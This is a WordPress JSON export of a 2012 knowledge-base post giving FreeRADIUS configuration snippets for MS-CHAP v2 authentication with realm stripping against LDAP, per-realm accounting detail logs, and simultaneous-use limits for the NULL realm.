{"id":526,"date":"2012-05-10T01:24:15","date_gmt":"2012-05-09T17:24:15","guid":{"rendered":"http:\/\/www.q-station.net\/kb\/?p=526"},"modified":"2012-05-25T13:48:46","modified_gmt":"2012-05-25T05:48:46","slug":"freeradius-special-setup","status":"publish","type":"post","link":"https:\/\/kb.q-station.net\/index.php\/2012\/05\/10\/freeradius-special-setup\/","title":{"rendered":"Freeradius special setup"},"content":{"rendered":"<p>Some special setups that you may find useful when configuring FreeRADIUS.<br \/>\n<!--more--><\/p>\n<h1>Authenticate username with domain using MS-CHAP v2<\/h1>\n<p>In MS-CHAP v2 authentication, the challenge and response include the user name, while in MS-CHAP v1 they contain only the password.  As a result, you can&#8217;t use the stripped username &#038; NT-Password in LDAP to match the challenge and response.<\/p>\n<p>Our setup generates a stripped username in the authorize section, so that the LDAP module can get the NT password from Samba LDAP by searching LDAP with the stripped username.  
Then FreeRADIUS can compare the challenge and response using the NT password and the un-stripped username.<\/p>\n<ul>\n<li>Suppose your site stores user entries in LDAP, e.g., Samba using an LDAP backend<\/li>\n<li>Suppose user entries are stored as uid=xxxx, with no realm, e.g., not xxxx@xx.com<\/li>\n<li>Set up <strong>proxy.conf<\/strong> so that the realm is authenticated locally\n<pre>\r\nrealm \"qstation\" {\r\n      nostrip\r\n      authhost        = LOCAL\r\n      accthost        = LOCAL\r\n}\r\n<\/pre>\n<\/li>\n<li>Strip the username for LDAP searching in the <strong>authorize<\/strong> section of <strong>sites-enabled\/default<\/strong>, before <strong>ldap<\/strong>\n<pre>\r\n        #  The ldap module will set Auth-Type to LDAP if it has not\r\n        #  already been set\r\n        if(\"%{User-Name}\"){\r\n           if(\"%{User-Name}\" =~ \/^(.*)@qstation$\/){  \r\n                update request {\r\n                        Stripped-User-Name := \"%{1}\"\r\n                }\r\n           }\r\n           # Username in unrecognised format\r\n           #else{\r\n           #        reject\r\n           #}\r\n        }\r\n        ldap\r\n<\/pre>\n<\/li>\n<\/ul>\n<h1>Separate detail log for proxied realm<\/h1>\n<p>In a default installation, all accounting packets, including proxied packets, are stored in the detail log.  For ease of administration, it may be a good idea to separate them by realm.  
You may not be interested in this setup if you are using an SQL database for accounting.<\/p>\n<ul>\n<li>Suppose realm &#8216;qstation&#8217; is proxied to another RADIUS server, in proxy.conf\n<pre>\r\nrealm qstation {\r\n        pool = qstation_pool\r\n        nostrip\r\n}\r\n<\/pre>\n<\/li>\n<li>Create <strong>modules\/detail.qstation<\/strong>\n<pre>\r\ndetail detail.qstation {\r\n        detailfile = ${radacctdir}\/qstation\/detail-%Y%m%d\r\n}\r\n<\/pre>\n<\/li>\n<li>In the <strong>accounting<\/strong> section of <strong>sites-enabled\/default<\/strong>\n<pre>\r\n  if(\"%{User-Name}\" =~ \/^(.*)@qstation$\/) {\r\n        detail.qstation\r\n  }\r\n  else {\r\n        # All other packets are logged as usual using detail\r\n        detail\r\n  }\r\n<\/pre>\n<\/li>\n<\/ul>\n<h1>Simultaneous login for Realm<\/h1>\n<p>It is common for your RADIUS server to need to handle realm redirection as well as answer requests for the NULL realm.<\/p>\n<ul>\n<li>In <strong>proxy.conf<\/strong>\n<pre>\r\nrealm NULL {  \r\n        authhost        = LOCAL\r\n        accthost        = LOCAL\r\n        Realm = \"NULL\"\r\n}\r\n<\/pre>\n<\/li>\n<li>In <strong>users<\/strong>\n<pre>\r\n# Limit Simultaneous-Use for realm NULL only\r\nDEFAULT Realm == \"NULL\", Pool-Name := \"main_pool\", Simultaneous-Use := 1\r\n            Fall-Through = Yes\r\n\r\nDEFAULT Framed-Protocol == PPP, Pool-Name := \"main_poolx\"\r\n        Framed-Protocol = PPP,\r\n        Framed-Compression = Van-Jacobson-TCP-IP\r\n<\/pre>\n<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Some special setups that you may find useful when configuring FreeRADIUS.<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_mi_skip_tracking":false},"categories":[27,8],"tags":[69],"_links":{"self":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts\/526"}],"collection":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/comments?post=526"}],"version-history":[{"count":14,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts\/526\/revisions"}],"predecessor-version":[{"id":557,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts\/526\/revisions\/557"}],"wp:attachment":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/media?parent=526"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/categories?post=526"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/tags?post=526"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}